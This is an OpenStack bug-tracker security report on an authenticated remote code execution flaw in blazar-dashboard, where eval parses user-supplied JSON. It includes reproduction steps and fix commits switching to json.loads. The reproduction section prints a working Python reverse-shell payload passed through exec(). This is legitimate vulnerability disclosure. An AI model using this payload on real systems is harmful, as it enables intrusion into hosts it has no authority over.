Blazar

Authenticated RCE in blazar-dashboard via python expression in POST parameters

Bug #1895688 reported by Lukas
262
This bug affects 2 people
Affects Status Importance Assigned to Milestone
Blazar
Fix Released
Critical
Pierre Riteau

Bug Description

#Description
Several endpoints in blazar-dashboard use the python `eval` function to parse raw user input which is expected to be in JSON format. This can be exploited by an authenticated user to gain arbitrary code execution on the Horizon host.

#Reproduction
- Log into Horizon (blazar_dashboard must be installed and enabled)
- Navigate to `Admin` -> `Reservation` -> `Hosts`
- Click `+ Create Hosts`
- Enter a python expression in the text area under `Extra Capabilities`
-- It is also possible to execute python code containing multiple statements by wrapping it into an `exec('<python code>')` call
-- The attached video shows how a reverse shell can be achieved using this payload: `exec('import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")')`
- Click `Create Hosts`

#Suggested fix
1.) Use `json.loads` instead of `eval` to parse JSON data
Only the `extra_caps` parameter could be tested due to problems with the local testing setup. However, the attached patch replaces all 4 usages of `eval` within the blazar_dashboard project, as they seem likely to contain additional vulnerabilities.
Please note that this change will break some hopefully unused functionality, like:
- arithmetic expressions in property values
```
{
    "key": 1300 + 37
}
```
- pseudo JSON using single quotes instead of double quotes
```
{
    'key': 1337
}
```

Revision history for this message
Lukas (lukas-eu) wrote :

Replacing all instances of `eval` with json.parse

Revision history for this message
Lukas (lukas-eu) wrote :
Revision history for this message
Lukas (lukas-eu) wrote :

Typo in previous comment: Patch replaces all instances of `eval` with `json.loads`

Revision history for this message
Jeremy Stanley (fungi) wrote :

I agree this sounds like a problem. I'm not especially familiar with use of Blazar, but it sounds like these JSON payloads are expected to come from sources other than the operator of the Horizon host, in which case this definitely represents at least privilege escalation.

Pierre: in your opinion would it be possible to include the included patch or something like it in a Victoria release candidate (as in by early next week)? If not, we're probably better off delaying any advisory until after release week and then backporting it in a stable point release just after.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Also I do strongly recommend adding bandit to the linters for your projects, as it explicitly identifies use of eval/exec in your source code (among other common risks).

Revision history for this message
Pierre Riteau (priteau) wrote :

@Jeremy: Out of the four uses of eval, one is parsing data coming from Nova and two others are input from an Horizon admin. Unfortunately, the last one is parsing user input in the Update Lease form using the field titled "Reservation values to update".

Revision history for this message
Pierre Riteau (priteau) wrote :

We should be able to merge this for Victoria.

Pierre Riteau (priteau)
information type: Private Security → Public Security
Changed in blazar:
status: New → Confirmed
importance: Undecided → Critical
assignee: nobody → Pierre Riteau (priteau)
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to blazar-dashboard (master)

Fix proposed to branch: master
Review: https://review.opendev.org/755810

Changed in blazar:
status: Confirmed → In Progress
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to blazar-dashboard (stable/ussuri)

Fix proposed to branch: stable/ussuri
Review: https://review.opendev.org/755812

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to blazar-dashboard (stable/train)

Fix proposed to branch: stable/train
Review: https://review.opendev.org/755813

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to blazar-dashboard (stable/stein)

Fix proposed to branch: stable/stein
Review: https://review.opendev.org/755814

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to blazar-dashboard (master)

Reviewed: https://review.opendev.org/755810
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=33c58438abf8221291d264db26a061279d4f22c7
Submitter: Zuul
Branch: master

commit 33c58438abf8221291d264db26a061279d4f22c7
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688

Changed in blazar:
status: In Progress → Fix Released
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to blazar-dashboard (stable/ussuri)

Reviewed: https://review.opendev.org/755812
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=168b4ae052480912fa6fdd2c77e16cd871528303
Submitter: Zuul
Branch: stable/ussuri

commit 168b4ae052480912fa6fdd2c77e16cd871528303
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

tags: added: in-stable-ussuri
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to blazar-dashboard (stable/train)

Reviewed: https://review.opendev.org/755813
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=63e9c5d25617467016eea1dff0a34803c86b0953
Submitter: Zuul
Branch: stable/train

commit 63e9c5d25617467016eea1dff0a34803c86b0953
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

tags: added: in-stable-train
tags: added: in-stable-stein
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to blazar-dashboard (stable/stein)

Reviewed: https://review.opendev.org/755814
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=ee10b2c5c195088ec14725b790c17289ad20ed63
Submitter: Zuul
Branch: stable/stein

commit ee10b2c5c195088ec14725b790c17289ad20ed63
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to blazar-dashboard (stable/victoria)

Fix proposed to branch: stable/victoria
Review: https://review.opendev.org/756064

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to blazar-dashboard (stable/victoria)

Reviewed: https://review.opendev.org/756064
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=5c7608dfa24dc5a5a3f18af09d35e8ea8760aee5
Submitter: Zuul
Branch: stable/victoria

commit 5c7608dfa24dc5a5a3f18af09d35e8ea8760aee5
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

tags: added: in-stable-victoria
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/blazar-dashboard 5.0.0.0rc1

This issue was fixed in the openstack/blazar-dashboard 5.0.0.0rc1 release candidate.

To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.